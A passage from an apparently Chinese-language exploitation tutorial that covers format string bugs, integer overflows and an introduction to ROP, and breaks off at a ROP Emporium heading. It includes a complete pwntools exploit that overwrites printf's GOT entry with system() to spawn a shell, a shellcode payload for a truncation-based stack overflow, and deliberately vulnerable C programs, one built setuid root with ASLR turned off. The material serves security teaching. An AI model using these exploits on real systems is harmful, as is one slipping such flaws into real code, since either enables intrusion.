0xffffd54c:     0x080484b0      0xf7ffda54      0x00000001      0x424135d0
0xffffd55c:     0x00004443      0x00000000      0xffffd538      0xffffd539
0xffffd56c:     0xffffd53a      0xffffd53b      0x34303125      0x33312563
gdb-peda$ finish
Run till exit from #0  0xf7e27c20 in printf () from /usr/lib32/libc.so.6
[----------------------------------registers-----------------------------------]
EAX: 0x312
EBX: 0x804a000 --> 0x8049f14 --> 0x1
ECX: 0x0
EDX: 0xf7f98830 --> 0x0
ESI: 0xf7f96e68 --> 0x1bad90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
EIP: 0x8048520 (<main+138>:     add    esp,0x20)
EFLAGS: 0x282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048514 <main+126>:        lea    eax,[ebp-0x94]
   0x804851a <main+132>:        push   eax
   0x804851b <main+133>:        call   0x8048350 <printf@plt>
=> 0x8048520 <main+138>:        add    esp,0x20
   0x8048523 <main+141>:        sub    esp,0xc
   0x8048526 <main+144>:        push   0xa
   0x8048528 <main+146>:        call   0x8048370 <putchar@plt>
   0x804852d <main+151>:        add    esp,0x10
[------------------------------------stack-------------------------------------]
0000| 0xffffd530 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
0004| 0xffffd534 --> 0x1
0008| 0xffffd538 --> 0x12345678
0012| 0xffffd53c --> 0xffffffff
0016| 0xffffd540 --> 0xffffd55a ("ABCD")
0020| 0xffffd544 --> 0xffffd564 --> 0xffffd538 --> 0x12345678
0024| 0xffffd548 --> 0x80481fc --> 0x38 ('8')
0028| 0xffffd54c --> 0x80484b0 (<main+26>:      add    ebx,0x1b50)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048520 in main ()
gdb-peda$ x/20x $esp
0xffffd530:     0xffffd564      0x00000001      0x12345678      0xffffffff
0xffffd540:     0xffffd55a      0xffffd564      0x080481fc      0x080484b0
0xffffd550:     0xf7ffda54      0x00000001      0x424135d0      0x00004443
0xffffd560:     0x00000000      0xffffd538      0xffffd539      0xffffd53a
0xffffd570:     0xffffd53b      0x34303125      0x33312563      0x6e686824

最后还得强调两点：

首先是需要关闭整个系统的 ASLR 保护，这可以保证栈在 gdb 环境中和直接运行中都保持不变，但这两个栈地址不一定相同
其次因为在 gdb 调试环境中的栈地址和直接运行程序是不一样的，所以我们需要结合格式化字符串漏洞读取内存，先泄露一个地址出来，然后根据泄露出来的地址计算实际地址

x86-64 中的格式化字符串漏洞

在 x64 体系中，多数调用惯例都是通过寄存器传递参数。在 Linux 上，前六个参数通过 RDI、RSI、RDX、RCX、R8 和 R9 传递；而在 Windows 中，前四个参数通过 RCX、RDX、R8 和 R9 来传递。

还是上面的程序，但是这次我们把它编译成 64 位：

$ gcc -fno-stack-protector -no-pie fmt.c

使用 AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p. 作为输入：

gdb-peda$ n
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0xffffffff
RDX: 0x88888888
RSI: 0x1
RDI: 0x7fffffffe3d0 ("AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
RBP: 0x7fffffffe460 --> 0x400660 (<__libc_csu_init>:    push   r15)
RSP: 0x7fffffffe3c0 --> 0x4241000000000000 ('')
RIP: 0x400648 (<main+113>:      call   0x4004e0 <printf@plt>)
R8 : 0x7fffffffe3c6 --> 0x44434241 ('ABCD')
R9 : 0xa ('\n')
R10: 0x7ffff7dd4380 --> 0x7ffff7dd0640 --> 0x7ffff7b9ed3a --> 0x636d656d5f5f0043 ('C')
R11: 0x246
R12: 0x400500 (<_start>:        xor    ebp,ebp)
R13: 0x7fffffffe540 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x40063d <main+102>: mov    r8,rdi
   0x400640 <main+105>: mov    rdi,rax
   0x400643 <main+108>: mov    eax,0x0
=> 0x400648 <main+113>: call   0x4004e0 <printf@plt>
   0x40064d <main+118>: mov    edi,0xa
   0x400652 <main+123>: call   0x4004d0 <putchar@plt>
   0x400657 <main+128>: nop
   0x400658 <main+129>: leave
Guessed arguments:
arg[0]: 0x7fffffffe3d0 ("AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
arg[1]: 0x1
arg[2]: 0x88888888
arg[3]: 0xffffffff
arg[4]: 0x7fffffffe3c6 --> 0x44434241 ('ABCD')
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe3c0 --> 0x4241000000000000 ('')
0008| 0x7fffffffe3c8 --> 0x4443 ('CD')
0016| 0x7fffffffe3d0 ("AAAAAAAA%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
0024| 0x7fffffffe3d8 ("%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.")
0032| 0x7fffffffe3e0 (".%p.%p.%p.%p.%p.%p.%p.")
0040| 0x7fffffffe3e8 ("p.%p.%p.%p.%p.")
0048| 0x7fffffffe3f0 --> 0x2e70252e7025 ('%p.%p.')
0056| 0x7fffffffe3f8 --> 0x1
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x0000000000400648 in main ()
gdb-peda$ x/10g $rsp
0x7fffffffe3c0: 0x4241000000000000      0x0000000000004443
0x7fffffffe3d0: 0x4141414141414141      0x70252e70252e7025
0x7fffffffe3e0: 0x252e70252e70252e      0x2e70252e70252e70
0x7fffffffe3f0: 0x00002e70252e7025      0x0000000000000001
0x7fffffffe400: 0x0000000000f0b5ff      0x00000000000000c2
gdb-peda$ c
Continuing.
AAAAAAAA0x1.0x88888888.0xffffffff.0x7fffffffe3c6.0xa.0x4241000000000000.0x4443.0x4141414141414141.0x70252e70252e7025.0x252e70252e70252e.

可以看到我们最后的输出中，前五个数字分别来自寄存器 RSI、RDX、RCX、R8 和 R9，后面的数字才取自栈，0x4141414141414141 在 %8$p 的位置。这里还有个地方要注意，我们前面说的 Linux 有 6 个寄存器用于传递参数，可是这里只输出了 5 个，原因是有一个寄存器 RDI 被用于传递格式字符串，可以从 gdb 中看到，arg[0] 就是由 RDI 传递的格式字符串。（现在你可以再回到 x86 的相关内容，可以看到在 x86 中格式字符串通过栈传递的，但是同样的也不会被打印出来）其他的操作和 x86 没有什么大的区别，只是这时我们就不能修改 arg2 的值了，因为它被存入了寄存器中。

CTF 中的格式化字符串漏洞

pwntools pwnlib.fmtstr 模块

文档地址：http://pwntools.readthedocs.io/en/stable/fmtstr.html

该模块提供了一些字符串漏洞利用的工具。该模块中定义了一个类 FmtStr 和一个函数 fmtstr_payload。

FmtStr 提供了自动化的字符串漏洞利用：

class pwnlib.fmtstr.FmtStr(execute_fmt, offset=None, padlen=0, numbwritten=0)

execute_fmt (function)：与漏洞进程进行交互的函数
offset (int)：你控制的第一个格式化程序的偏移量
padlen (int)：在 paylod 之前添加的 pad 的大小
numbwritten (int)：已经写入的字节数

fmtstr_payload 用于自动生成格式化字符串 paylod：

pwnlib.fmtstr.fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')

offset (int)：你控制的第一个格式化程序的偏移量
writes (dict)：格式为 {addr: value, addr2: value2}，用于往 addr 里写入 value 的值（常用：{printf_got}）
numbwritten (int)：已经由 printf 函数写入的字节数
write_size (str)：必须是 byte，short 或 int。告诉你是要逐 byte 写，逐 short 写还是逐 int 写（hhn，hn或n）

我们通过一个例子来熟悉下该模块的使用（任意地址内存读写）：fmt.c fmt

#include<stdio.h>
void main() {
    char str[1024];
    while(1) {
        memset(str, '\0', 1024);
        read(0, str, 1024);
        printf(str);
        fflush(stdout);
    }
}

为了简单一点，我们关闭 ASLR，并使用下面的命令编译，关闭 PIE，使得程序的 .text .bss 等段的内存地址固定：

# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -m32 -fno-stack-protector -no-pie fmt.c

很明显，程序存在格式化字符串漏洞，我们的思路是将 printf() 函数的地址改成 system() 函数的地址，这样当我们再次输入 /bin/sh 时，就可以获得 shell 了。

第一步先计算偏移，虽然 pwntools 中可以很方便地构造出 exp，但这里，我们还是先演示手工方法怎么做，最后再用 pwntools 的方法。在 gdb 中，先在 main 处下断点，运行程序，这时 libc 已经被加载进来了。我们输入 "AAAA" 试一下：

gdb-peda$ b main
...
gdb-peda$ r
...
gdb-peda$ n
[----------------------------------registers-----------------------------------]
EAX: 0xffffd1f0 ("AAAA\n")
EBX: 0x804a000 --> 0x8049f10 --> 0x1
ECX: 0xffffd1f0 ("AAAA\n")
EDX: 0x400
ESI: 0xf7f97000 --> 0x1bbd90
EDI: 0x0
EBP: 0xffffd5f8 --> 0x0
ESP: 0xffffd1e0 --> 0xffffd1f0 ("AAAA\n")
EIP: 0x8048512 (<main+92>:      call   0x8048370 <printf@plt>)
EFLAGS: 0x296 (carry PARITY ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8048508 <main+82>: sub    esp,0xc
   0x804850b <main+85>: lea    eax,[ebp-0x408]
   0x8048511 <main+91>: push   eax
=> 0x8048512 <main+92>: call   0x8048370 <printf@plt>
   0x8048517 <main+97>: add    esp,0x10
   0x804851a <main+100>:        mov    eax,DWORD PTR [ebx-0x4]
   0x8048520 <main+106>:        mov    eax,DWORD PTR [eax]
   0x8048522 <main+108>:        sub    esp,0xc
Guessed arguments:
arg[0]: 0xffffd1f0 ("AAAA\n")
[------------------------------------stack-------------------------------------]
0000| 0xffffd1e0 --> 0xffffd1f0 ("AAAA\n")
0004| 0xffffd1e4 --> 0xffffd1f0 ("AAAA\n")
0008| 0xffffd1e8 --> 0x400
0012| 0xffffd1ec --> 0x80484d0 (<main+26>:      add    ebx,0x1b30)
0016| 0xffffd1f0 ("AAAA\n")
0020| 0xffffd1f4 --> 0xa ('\n')
0024| 0xffffd1f8 --> 0x0
0028| 0xffffd1fc --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x08048512 in main ()

我们看到输入 printf() 的变量 arg[0]: 0xffffd1f0 ("AAAA\n") 在栈的第 5 行，除去第一个格式化字符串，即偏移量为 4。

读取重定位表获得 printf() 的 GOT 地址（第一列 Offset）：

$ readelf -r a.out

Relocation section '.rel.dyn' at offset 0x2f4 contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ff8  00000406 R_386_GLOB_DAT    00000000   __gmon_start__
08049ffc  00000706 R_386_GLOB_DAT    00000000   stdout@GLIBC_2.0

Relocation section '.rel.plt' at offset 0x304 contains 5 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   read@GLIBC_2.0
0804a010  00000207 R_386_JUMP_SLOT   00000000   printf@GLIBC_2.0
0804a014  00000307 R_386_JUMP_SLOT   00000000   fflush@GLIBC_2.0
0804a018  00000507 R_386_JUMP_SLOT   00000000   __libc_start_main@GLIBC_2.0
0804a01c  00000607 R_386_JUMP_SLOT   00000000   memset@GLIBC_2.0

在 gdb 中获得 printf() 的虚拟地址：

gdb-peda$ p printf
$1 = {<text variable, no debug info>} 0xf7e26bf0 <printf>

获得 system() 的虚拟地址：

gdb-peda$ p system
$1 = {<text variable, no debug info>} 0xf7e17060 <system>

好了，演示完怎样用手工的方式得到构造 exp 需要的信息，下面我们给出使用 pwntools 构造的完整漏洞利用代码：

# -*- coding: utf-8 -*-
from pwn import *

elf = ELF('./a.out')
r = process('./a.out')
libc = ELF('/usr/lib32/libc.so.6')

# 计算偏移量
def exec_fmt(payload):
    r.sendline(payload)
    info = r.recv()
    return info
auto = FmtStr(exec_fmt)
offset = auto.offset

# 获得 printf 的 GOT 地址
printf_got = elf.got['printf']
log.success("printf_got => {}".format(hex(printf_got)))

# 获得 printf 的虚拟地址
payload = p32(printf_got) + '%{}$s'.format(offset)
r.send(payload)
printf_addr = u32(r.recv()[4:8])
log.success("printf_addr => {}".format(hex(printf_addr)))

# 获得 system 的虚拟地址
system_addr = printf_addr - (libc.symbols['printf'] - libc.symbols['system'])
log.success("system_addr => {}".format(hex(system_addr)))

payload = fmtstr_payload(offset, {printf_got : system_addr})
r.send(payload)
r.send('/bin/sh')
r.recv()
r.interactive()
$ python2 exp.py
[*] '/home/firmy/Desktop/RE4B/a.out'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Starting local process './a.out': pid 17375
[*] '/usr/lib32/libc.so.6'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] Found format string offset: 4
[+] printf_got => 0x804a010
[+] printf_addr => 0xf7e26bf0
[+] system_addr => 0xf7e17060
[*] Switching to interactive mode
$ echo "hacked!"
hacked!

这样我们就获得了 shell，可以看到输出的信息和我们手工得到的信息完全相同。

3.1.2 整数溢出

什么是整数溢出

简介

在 C 语言基础的章节中，我们介绍了 C 语言整数的基础知识，下面我们详细介绍整数的安全问题。

由于整数在内存里面保存在一个固定长度的空间内，它能存储的最大值和最小值是固定的，如果我们尝试去存储一个数，而这个数又大于这个固定的最大值时，就会导致整数溢出。（x86-32 的数据模型是 ILP32，即整数（Int）、长整数（Long）和指针（Pointer）都是 32 位。）

整数溢出的危害

如果一个整数用来计算一些敏感数值，如缓冲区大小或数值索引，就会产生潜在的危险。通常情况下，整数溢出并没有改写额外的内存，不会直接导致任意代码执行，但是它会导致栈溢出和堆溢出，而后两者都会导致任意代码执行。由于整数溢出出现之后，很难被立即察觉，比较难用一个有效的方法去判断是否出现或者可能出现整数溢出。

整数溢出

关于整数的异常情况主要有三种：

溢出
- 只有有符号数才会发生溢出。有符号数最高位表示符号，在两正或两负相加时，有可能改变符号位的值，产生溢出
- 溢出标志 OF 可检测有符号数的溢出
回绕
- 无符号数 0-1 时会变成最大的数，如 1 字节的无符号数会变为 255，而 255+1 会变成最小数 0。
- 进位标志 CF 可检测无符号数的回绕
截断
- 将一个较大宽度的数存入一个宽度小的操作数中，高位发生截断

有符号整数溢出

上溢出

int i;
i = INT_MAX;  // 2 147 483 647
i++;
printf("i = %d\n", i);  // i = -2 147 483 648

下溢出

i = INT_MIN;  // -2 147 483 648
i--;
printf("i = %d\n", i);  // i = 2 147 483 647

无符号数回绕

涉及无符号数的计算永远不会溢出，因为不能用结果为无符号整数表示的结果值被该类型可以表示的最大值加 1 之和取模减（reduced modulo）。因为回绕，一个无符号整数表达式永远无法求出小于零的值。

使用下图直观地理解回绕，在轮上按顺时针方向将值递增产生的值紧挨着它：

unsigned int ui;
ui = UINT_MAX;  // 在 x86-32 上为 4 294 967 295
ui++;
printf("ui = %u\n", ui);  // ui = 0
ui = 0;
ui--;
printf("ui = %u\n", ui);  // 在 x86-32 上，ui = 4 294 967 295

截断

加法截断：

0xffffffff + 0x00000001
= 0x0000000100000000 (long long)
= 0x00000000 (long)

乘法截断：

0x00123456 * 0x00654321
= 0x000007336BF94116 (long long)
= 0x6BF94116 (long)

整型提升和宽度溢出

整型提升是指当计算表达式中包含了不同宽度的操作数时，较小宽度的操作数会被提升到和较大操作数一样的宽度，然后再进行计算。

示例：源码

#include<stdio.h>
void main() {
    int l;  
    short s;
    char c;

    l = 0xabcddcba;
    s = l;
    c = l;

    printf("宽度溢出\n");
    printf("l = 0x%x (%d bits)\n", l, sizeof(l) * 8);
    printf("s = 0x%x (%d bits)\n", s, sizeof(s) * 8);
    printf("c = 0x%x (%d bits)\n", c, sizeof(c) * 8);

    printf("整型提升\n");
    printf("s + c = 0x%x (%d bits)\n", s+c, sizeof(s+c) * 8);
}
$ ./a.out
宽度溢出
l = 0xabcddcba (32 bits)
s = 0xffffdcba (16 bits)
c = 0xffffffba (8 bits)
整型提升
s + c = 0xffffdc74 (32 bits)

使用 gdb 查看反汇编代码：

gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x0000056d <+0>:     lea    ecx,[esp+0x4]
   0x00000571 <+4>:     and    esp,0xfffffff0
   0x00000574 <+7>:     push   DWORD PTR [ecx-0x4]
   0x00000577 <+10>:    push   ebp
   0x00000578 <+11>:    mov    ebp,esp
   0x0000057a <+13>:    push   ebx
   0x0000057b <+14>:    push   ecx
   0x0000057c <+15>:    sub    esp,0x10
   0x0000057f <+18>:    call   0x470 <__x86.get_pc_thunk.bx>
   0x00000584 <+23>:    add    ebx,0x1a7c
   0x0000058a <+29>:    mov    DWORD PTR [ebp-0xc],0xabcddcba
   0x00000591 <+36>:    mov    eax,DWORD PTR [ebp-0xc]
   0x00000594 <+39>:    mov    WORD PTR [ebp-0xe],ax
   0x00000598 <+43>:    mov    eax,DWORD PTR [ebp-0xc]
   0x0000059b <+46>:    mov    BYTE PTR [ebp-0xf],al
   0x0000059e <+49>:    sub    esp,0xc
   0x000005a1 <+52>:    lea    eax,[ebx-0x1940]
   0x000005a7 <+58>:    push   eax
   0x000005a8 <+59>:    call   0x400 <puts@plt>
   0x000005ad <+64>:    add    esp,0x10
   0x000005b0 <+67>:    sub    esp,0x4
   0x000005b3 <+70>:    push   0x20
   0x000005b5 <+72>:    push   DWORD PTR [ebp-0xc]
   0x000005b8 <+75>:    lea    eax,[ebx-0x1933]
   0x000005be <+81>:    push   eax
   0x000005bf <+82>:    call   0x3f0 <printf@plt>
   0x000005c4 <+87>:    add    esp,0x10
   0x000005c7 <+90>:    movsx  eax,WORD PTR [ebp-0xe]
   0x000005cb <+94>:    sub    esp,0x4
   0x000005ce <+97>:    push   0x10
   0x000005d0 <+99>:    push   eax
   0x000005d1 <+100>:   lea    eax,[ebx-0x191f]
   0x000005d7 <+106>:   push   eax
   0x000005d8 <+107>:   call   0x3f0 <printf@plt>
   0x000005dd <+112>:   add    esp,0x10
   0x000005e0 <+115>:   movsx  eax,BYTE PTR [ebp-0xf]
   0x000005e4 <+119>:   sub    esp,0x4
   0x000005e7 <+122>:   push   0x8
   0x000005e9 <+124>:   push   eax
   0x000005ea <+125>:   lea    eax,[ebx-0x190b]
   0x000005f0 <+131>:   push   eax
   0x000005f1 <+132>:   call   0x3f0 <printf@plt>
   0x000005f6 <+137>:   add    esp,0x10
   0x000005f9 <+140>:   sub    esp,0xc
   0x000005fc <+143>:   lea    eax,[ebx-0x18f7]
   0x00000602 <+149>:   push   eax
   0x00000603 <+150>:   call   0x400 <puts@plt>
   0x00000608 <+155>:   add    esp,0x10
   0x0000060b <+158>:   movsx  edx,WORD PTR [ebp-0xe]
   0x0000060f <+162>:   movsx  eax,BYTE PTR [ebp-0xf]
   0x00000613 <+166>:   add    eax,edx
   0x00000615 <+168>:   sub    esp,0x4
   0x00000618 <+171>:   push   0x20
   0x0000061a <+173>:   push   eax
   0x0000061b <+174>:   lea    eax,[ebx-0x18ea]
   0x00000621 <+180>:   push   eax
   0x00000622 <+181>:   call   0x3f0 <printf@plt>
   0x00000627 <+186>:   add    esp,0x10
   0x0000062a <+189>:   nop
   0x0000062b <+190>:   lea    esp,[ebp-0x8]
   0x0000062e <+193>:   pop    ecx
   0x0000062f <+194>:   pop    ebx
   0x00000630 <+195>:   pop    ebp
   0x00000631 <+196>:   lea    esp,[ecx-0x4]
   0x00000634 <+199>:   ret
End of assembler dump.

在整数转换的过程中，有可能导致下面的错误：

损失值：转换为值的大小不能表示的一种类型
损失符号：从有符号类型转换为无符号类型，导致损失符号

漏洞多发函数

我们说过整数溢出要配合上其他类型的缺陷才能有用，下面的两个函数都有一个 size_t 类型的参数，常常被误用而产生整数溢出，接着就可能导致缓冲区溢出漏洞。

#include <string.h>

void *memcpy(void *dest, const void *src, size_t n);

memcpy() 函数将 src 所指向的字符串中以 src 地址开始的前 n 个字节复制到 dest 所指的数组中，并返回 dest。

#include <string.h>

char *strncpy(char *dest, const char *src, size_t n);

strncpy() 函数从源 src 所指的内存地址的起始位置开始复制 n 个字节到目标 dest 所指的内存地址的起始位置中。

两个函数中都有一个类型为 size_t 的参数，它是无符号整型的 sizeof 运算符的结果。

typedef unsigned int size_t;

整数溢出示例

现在我们已经知道了整数溢出的原理和主要形式，下面我们先看几个简单示例，然后实际操作利用一个整数溢出漏洞。

示例

示例一，整数转换：

char buf[80];
void vulnerable() {
    int len = read_int_from_network();
    char *p = read_string_from_network();
    if (len > 80) {
        error("length too large: bad dog, no cookie for you!");
        return;
    }
    memcpy(buf, p, len);
}

这个例子的问题在于，如果攻击者给 len 赋于了一个负数，则可以绕过 if 语句的检测，而执行到 memcpy() 的时候，由于第三个参数是 size_t 类型，负数 len 会被转换为一个无符号整型，它可能是一个非常大的正数，从而复制了大量的内容到 buf 中，引发了缓冲区溢出。

示例二，回绕和溢出：

void vulnerable() {
    size_t len;
    // int len;
    char* buf;

    len = read_int_from_network();
    buf = malloc(len + 5);
    read(fd, buf, len);
    ...
}

这个例子看似避开了缓冲区溢出的问题，但是如果 len 过大，len+5 有可能发生回绕。比如说，在 x86-32 上，如果 len = 0xFFFFFFFF，则 len+5 = 0x00000004，这时 malloc() 只分配了 4 字节的内存区域，然后在里面写入大量的数据，缓冲区溢出也就发生了。（如果将 len 声明为有符号 int 类型，len+5 可能发生溢出）

示例三，截断：

void main(int argc, char *argv[]) {
    unsigned short int total;
    total = strlen(argv[1]) + strlen(argv[2]) + 1;
    char *buf = (char *)malloc(total);
    strcpy(buf, argv[1]);
    strcat(buf, argv[2]);
    ...
}

这个例子接受两个字符串类型的参数并计算它们的总长度，程序分配足够的内存来存储拼接后的字符串。首先将第一个字符串参数复制到缓冲区中，然后将第二个参数连接到尾部。如果攻击者提供的两个字符串总长度无法用 total 表示，则会发生截断，从而导致后面的缓冲区溢出。

实战

看了上面的示例，我们来真正利用一个整数溢出漏洞。源码

#include<stdio.h>
#include<string.h>
void validate_passwd(char *passwd) {
    char passwd_buf[11];
    unsigned char passwd_len = strlen(passwd);
    if(passwd_len >= 4 && passwd_len <= 8) {
        printf("good!\n");
        strcpy(passwd_buf, passwd);
    } else {
        printf("bad!\n");
    }
}

int main(int argc, char *argv[]) {
    if(argc != 2) {
        printf("error\n");
        return 0;
    }
    validate_passwd(argv[1]);
}

上面的程序中 strlen() 返回类型是 size_t，却被存储在无符号字符串类型中，任意超过无符号字符串最大上限值（256 字节）的数据都会导致截断异常。当密码长度为 261 时，截断后值变为 5，成功绕过了 if 的判断，导致栈溢出。下面我们利用溢出漏洞来获得 shell。

编译命令：

# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -g -fno-stack-protector -z execstack vuln.c
$ sudo chown root vuln
$ sudo chgrp root vuln
$ sudo chmod +s vuln

使用 gdb 反汇编 validate_passwd 函数。

gdb-peda$ disassemble validate_passwd
Dump of assembler code for function validate_passwd:
   0x0000059d <+0>:     push   ebp                            ; 压入 ebp
   0x0000059e <+1>:     mov    ebp,esp
   0x000005a0 <+3>:     push   ebx                            ; 压入 ebx
   0x000005a1 <+4>:     sub    esp,0x14
   0x000005a4 <+7>:     call   0x4a0 <__x86.get_pc_thunk.bx>
   0x000005a9 <+12>:    add    ebx,0x1a57
   0x000005af <+18>:    sub    esp,0xc
   0x000005b2 <+21>:    push   DWORD PTR [ebp+0x8]
   0x000005b5 <+24>:    call   0x430 <strlen@plt>
   0x000005ba <+29>:    add    esp,0x10
   0x000005bd <+32>:    mov    BYTE PTR [ebp-0x9],al         ; 将 len 存入 [ebp-0x9]
   0x000005c0 <+35>:    cmp    BYTE PTR [ebp-0x9],0x3
   0x000005c4 <+39>:    jbe    0x5f2 <validate_passwd+85>
   0x000005c6 <+41>:    cmp    BYTE PTR [ebp-0x9],0x8
   0x000005ca <+45>:    ja     0x5f2 <validate_passwd+85>
   0x000005cc <+47>:    sub    esp,0xc
   0x000005cf <+50>:    lea    eax,[ebx-0x1910]
   0x000005d5 <+56>:    push   eax
   0x000005d6 <+57>:    call   0x420 <puts@plt>
   0x000005db <+62>:    add    esp,0x10
   0x000005de <+65>:    sub    esp,0x8
   0x000005e1 <+68>:    push   DWORD PTR [ebp+0x8]
   0x000005e4 <+71>:    lea    eax,[ebp-0x14]                ; 取 passwd_buf 地址
   0x000005e7 <+74>:    push   eax                           ; 压入 passwd_buf
   0x000005e8 <+75>:    call   0x410 <strcpy@plt>
   0x000005ed <+80>:    add    esp,0x10
   0x000005f0 <+83>:    jmp    0x604 <validate_passwd+103>
   0x000005f2 <+85>:    sub    esp,0xc
   0x000005f5 <+88>:    lea    eax,[ebx-0x190a]
   0x000005fb <+94>:    push   eax
   0x000005fc <+95>:    call   0x420 <puts@plt>
   0x00000601 <+100>:   add    esp,0x10
   0x00000604 <+103>:   nop
   0x00000605 <+104>:   mov    ebx,DWORD PTR [ebp-0x4]
   0x00000608 <+107>:   leave  
   0x00000609 <+108>:   ret
End of assembler dump.

通过阅读反汇编代码，我们知道缓冲区 passwd_buf 位于 ebp=0x14 的位置（0x000005e4 <+71>: lea eax,[ebp-0x14]），而返回地址在 ebp+4 的位置，所以返回地址相对于缓冲区 0x18 的位置。我们测试一下：

gdb-peda$ r `python2 -c 'print "A"*24 + "B"*4 + "C"*233'`
Starting program: /home/a.out `python2 -c 'print "A"*24 + "B"*4 + "C"*233'`
good!

Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd0f4 ('A' <repeats 24 times>, "BBBB", 'C' <repeats 172 times>...)
EBX: 0x41414141 ('AAAA')
ECX: 0xffffd490 --> 0x534c0043 ('C')
EDX: 0xffffd1f8 --> 0xffff0043 --> 0x0
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd110 ('C' <repeats 200 times>...)
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd110 ('C' <repeats 200 times>...)
0004| 0xffffd114 ('C' <repeats 200 times>...)
0008| 0xffffd118 ('C' <repeats 200 times>...)
0012| 0xffffd11c ('C' <repeats 200 times>...)
0016| 0xffffd120 ('C' <repeats 200 times>...)
0020| 0xffffd124 ('C' <repeats 200 times>...)
0024| 0xffffd128 ('C' <repeats 200 times>...)
0028| 0xffffd12c ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()

可以看到 EIP 被 BBBB 覆盖，相当于我们获得了返回地址的控制权。构建下面的 payload：

from pwn import *

ret_addr = 0xffffd118     # ebp = 0xffffd108
shellcode = shellcraft.i386.sh()

payload = "A" * 24
payload += p32(ret_addr)
payload += "\x90" * 20
payload += asm(shellcode)
payload += "C" * 169      # 24 + 4 + 20 + 44 + 169 = 261

3.1.4 返回导向编程（ROP）

ROP 简介
- 寻找 gadgets
- 常用的 gadgets
ROP Emporium
- ret2win32
- ret2win
- split32
- split
- callme32
- callme
- write432
- write4
- badchars32
- badchars
- fluff32
- fluff
- pivot32
- pivot
更多资料

ROP 简介

返回导向编程（Return-Oriented Programming，缩写：ROP）是一种高级的内存攻击技术，该技术允许攻击者在现代操作系统的各种通用防御下执行代码，如内存不可执行和代码签名等。这类攻击往往利用操作堆栈调用时的程序漏洞，通常是缓冲区溢出。攻击者控制堆栈调用以劫持程序控制流并执行针对性的机器语言指令序列（gadgets），每一段 gadget 通常以 return 指令（ret，机器码为c3）结束，并位于共享库代码中的子程序中。通过执行这些指令序列，也就控制了程序的执行。

ret 指令相当于 pop eip。即，首先将 esp 指向的 4 字节内容读取并赋值给 eip，然后 esp 加上 4 字节指向栈的下一个位置。如果当前执行的指令序列仍然以 ret 指令结束，则这个过程将重复， esp 再次增加并且执行下一个指令序列。

寻找 gadgets

在程序中寻找所有的 c3（ret）字节
向前搜索，看前面的字节是否包含一个有效指令，这里可以指定最大搜索字节数，以获得不同长度的 gadgets
记录下我们找到的所有有效指令序列

理论上我们是可以这样寻找 gadgets 的，但实际上有很多工具可以完成这个工作，如 ROPgadget，Ropper 等。更完整的搜索可以使用 http://ropshell.com/。

常用的 gadgets

对于 gadgets 能做的事情，基本上只要你敢想，它就敢执行。下面简单介绍几种用法：

保存栈数据到寄存器
- 将栈顶的数据抛出并保存到寄存器中，然后跳转到新的栈顶地址。所以当返回地址被一个 gadgets 的地址覆盖，程序将在返回后执行该指令序列。
- 如：pop eax; ret
保存内存数据到寄存器
- 将内存地址处的数据加载到内存器中。
- 如：mov ecx,[eax]; ret
保存寄存器数据到内存
- 将寄存器的值保存到内存地址处。
- 如：mov [eax],ecx; ret
算数和逻辑运算
- add, sub, mul, xor 等。
- 如：add eax,ebx; ret, xor edx,edx; ret
系统调用
- 执行内核中断
- 如：int 0x80; ret, call gs:[0x10]; ret
会影响栈帧的 gadgets
- 这些 gadgets 会改变 ebp 的值，从而影响栈帧，在一些操作如 stack pivot 时我们需要这样的指令来转移栈帧。
- 如：leave; ret, pop ebp; ret

ROP Emporium

ROP Emporium 提供了一系列用于学习 ROP 的挑战，每一个挑战都介绍了一个知识，难度也逐渐增加，是循序渐进学习 ROP 的好资料。ROP Emporium 还有个特点是它专注于 ROP，所有挑战都有相同的漏洞点，不同的只是 ROP 链构造的不同，所以不涉及其他的漏洞利用和逆向的内容。每个挑战都包含了 32 位和 64 位的程序，通过对比能帮助我们理解 ROP 链在不同体系结构下的差异，例如参数的传递等。这篇文章我们就从这些挑战中来学习吧。

这些挑战都包含一个 flag.txt 的文件，我们的目标就是通过控制程序执行，来打印出文件中的内容。当然你也可以尝试获得 shell。

下载文件

ret2win32

